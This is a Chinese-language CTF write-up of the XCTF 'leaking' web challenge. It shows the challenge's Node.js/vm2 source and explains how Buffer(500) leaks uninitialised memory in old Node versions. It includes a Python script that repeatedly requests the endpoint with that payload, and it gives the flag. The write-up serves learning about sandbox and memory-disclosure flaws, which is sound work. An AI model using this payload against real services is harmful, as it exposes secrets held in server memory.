打開網(wǎng)站我們可以看到如下代碼

"use strict";var randomstring = require("randomstring"); var express = require("express"); var {VM } = require("vm2"); var fs = require("fs");var app = express(); var flag = require("./config.js").flagapp.get("/", function(req, res) {res.header("Content-Type", "text/plain");/* Orange is so kind so he put the flag here. But if you can guess correctly :P */eval("var flag_" + randomstring.generate(64) + " = \"flag{" + flag + "}\";")if (req.query.data && req.query.data.length <= 12) {var vm = new VM({timeout: 1000});console.log(req.query.data);res.send("eval ->" + vm.run(req.query.data));} else {res.send(fs.readFileSync(__filename).toString());} });app.listen(3000, function() {console.log("listening on port 3000!"); });

?這里涉及到了node.js的知識以及沙箱的知識。

貼幾篇文章可以了解一下其中的知識。??????Node.js沙箱逃逸

淺談 Node.js安全

首先，通過簡單的代碼審計我們知道由于存在eval我們是可以在vm2環(huán)境中執(zhí)行命令的，但是會被req.query.data.length限制。

所以我們要思考如何繞過限制。這里涉及到Node.js中的buffer函數(shù)

在較早一點的 node 版本中 (8.0 之前)，當(dāng) Buffer 的構(gòu)造函數(shù)傳入數(shù)字時, 會得到與數(shù)字長度一致的一個 Buffer，并且這個 Buffer 是未清零的 8.0 之后的版本可以通過另一個函數(shù) Buffer.allocUnsafe(size) 來獲得未清空的內(nèi)存

也就是說，我們可以通過buffer來讀取內(nèi)存，從而繞過限制。?

這里貼別人wp的腳本：

# encoding=utf-8import requests import time url = 'http://YOURIP:PORT?data=Buffer(500)' response = '' while 'flag' not in response:req = requests.get(url)response = req.textprint(req.status_code)time.sleep(0.1)if 'flag{' in response:print(response)break

（小聲bb一句這個腳本我不知道為什么執(zhí)行不了，提示顯示ModuleNotFoundError: No module named 'requests'。畢竟自己太菜了，還沒學(xué)python）

拿到flag

flag{4nother_h34rtbleed_in_n0dejs}

總結(jié)

以上是生活随笔為你收集整理的攻防世界xctfweb题leaking题解的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。